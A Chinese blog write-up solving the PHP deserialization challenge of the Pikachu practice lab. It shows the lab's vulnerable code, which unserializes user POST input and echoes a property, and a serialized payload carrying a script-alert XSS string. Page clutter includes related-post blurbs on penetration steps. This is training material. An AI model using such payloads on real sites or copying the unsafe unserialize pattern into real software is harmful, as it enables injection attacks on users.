【反序列化】通关pikachu靶场PHP反序列化漏洞

最新推荐文章于 2024-06-16 18:29:03 发布
最新推荐文章于 2024-06-16 18:29:03 发布
阅读量365 收藏
点赞数
分类专栏: php反序列化漏洞 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134561664
版权

基本环境:

系统环境Windows
工具burpsuite

代码审计:

class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}


//O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
$html='';
if(isset($_POST['o'])){
    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){
        $html.="<p>大兄弟,来点劲爆点儿的!</p>";
    }else{
        $html.="<p>{$unser->test}</p>";
    }

}

$s 接收上传的参数

$s = $_POST['o'];

利用'o'进行判断上传数据是否进行过序列化

if(!@$unser = unserialize($s))

1.开启环境:

2.进行测试 

根据题目我们可以看到他是反序列化,意思为当我们输入序列化字节流时他会进行反序列化解析,然后执行代码 

 3.构造一个序列化Payload

<?php
class S{
    var $test = "/script>alert(/wj33333/)//script>";
}
    // 创建一个对象
    $s=new S(); 
    // 把这个对象进行序列化输出
    print_r(serialize($s)); 
?>

输出:

将/替换回<

O:1:"S":1:{s:4:"test";s:33:"<script>alert(/wj33333/)</script>";}

4.解题:

wj33333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
day3-java反序列化&php反序列化靶场&之前漏洞复习
m0_70099896的博客
11-22 941
查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞。查看旁站有没有通用性的cms或者其他漏洞,如果存在cms,则可以针对CMS的版本进行相关的漏洞利用。对于一些特殊的网站,还可以尝试社会工程学攻击,比如伪造邮箱链接钓鱼,伪造短信或者电话骗取验证码等等。查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如:ftp,ssh,弱口令等等。如果确实找到了一些安全的问题则向相关的负责人反馈,提出修复的建议。首先获取网站的域名,查看是否有子域名。
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
通关pikachu靶场PHP反序列化漏洞
2301_79328240的博客
11-23 97
序列化:序列化是将对象转化为字符串流,利于对象的保存和传输反序列化反序列化就是将序列化后的字符串流还原回对象。
Pikachu靶场通关笔记--php反序列化漏洞
weixin_45908624的博客
12-14 592
反序列化
Pikachu靶场PHP反序列漏洞详解
m0_46467017的博客
05-31 1344
Pikachu靶场PHP反序列漏洞详解前言PHP反序列漏洞简述正式闯关代码审计 前言 本篇文章用于巩固对自己PHP反序列漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu PHP反序列化(皮卡丘漏洞平台通关系列)) PHP反序列漏洞简述 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 先跟着pikachu简单学习一下什么叫序列化和反序列化: 但其实我已知这里有3个地方写的不对,需要更正一下: (1)序列化结果中的S不是对象名称,而
Pikachu 靶场 PHP 反序列化漏洞通关解析
Flag少侠的博客
05-17 2316
PHP反序列化漏洞是指在PHP应用程序中存在的安全漏洞,攻击者可以利用该漏洞通过精心构造的恶意序列化数据来执行恶意代码或实现未授权的操作。这种漏洞可能导致远程代码执行、敏感信息泄露、服务器拒绝服务等安全问题。PHP中的反序列化漏洞通常与序列化和反序列化功能相关。在PHP中,序列化是将对象或数据结构转换为可传输或存储的字符串的过程,而反序列化则是将这些字符串转换回原始对象或数据结构的过程。
pikachu靶场通关
热门推荐
无言道的博客
12-03 6万+
皮卡丘靶场详解,有什么问题可以在评论区留言。
Pikachu靶场通过记录
sGanYu
10-15 2721
一、暴力破解 基于表单的暴力破解 缺少验证码匹配,无登录次数限制等等条件,可以对用户名或密码暴力破解 burp抓包 设置target
Pikachu靶场通关记录(详细)
ak.Gh0st的博客
10-31 1万+
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。
pikachu靶场新手通关训练
m0_74736832的博客
01-15 1097
pikachu靶场新手通关训练,sql注入新手
pikachu靶场通关(下)
qq_65950075的博客
04-17 644
一、什么是RCE? RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而控制整
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
皮卡丘靶场,初始化就能用
09-24
皮卡丘靶场,里面有安装和使用手册,我的数据库账号是root,密码是123456,自己的不一样就改一下,在inc/config.inc.php文件,然后初始化就能用啦~~~
ImageNet-1k 测试集 两大坑
最新发布
weixin_42815846的博客
06-16 87
不然就会浪费一次提交机会,直接提交submission.txt就可以,注意每排5个预测结果,用于计算top5 error。2、用torchvision自带的imagenet dataset类加载进来的数据的类别标签,)但torchvision自动给你弄成。1、官方网站提交test set标签时,,但是他们的类别id不一样!以chickadee 山雀为例。这是torchvision的。他们的WNID都一样,
1. NAS和SAN存储
u010198709的博客
06-13 412
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 296
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 868
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
pikachu反序列化漏洞
08-04
反序列化漏洞是一种安全漏洞,它允许攻击者在反序列化过程中执行恶意代码或导致不可预料的后果。在引用[1]中的示例中,反序列化函数unserialize()被用于将序列化的字符串还原为对象。然而,如果未对用户输入的序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值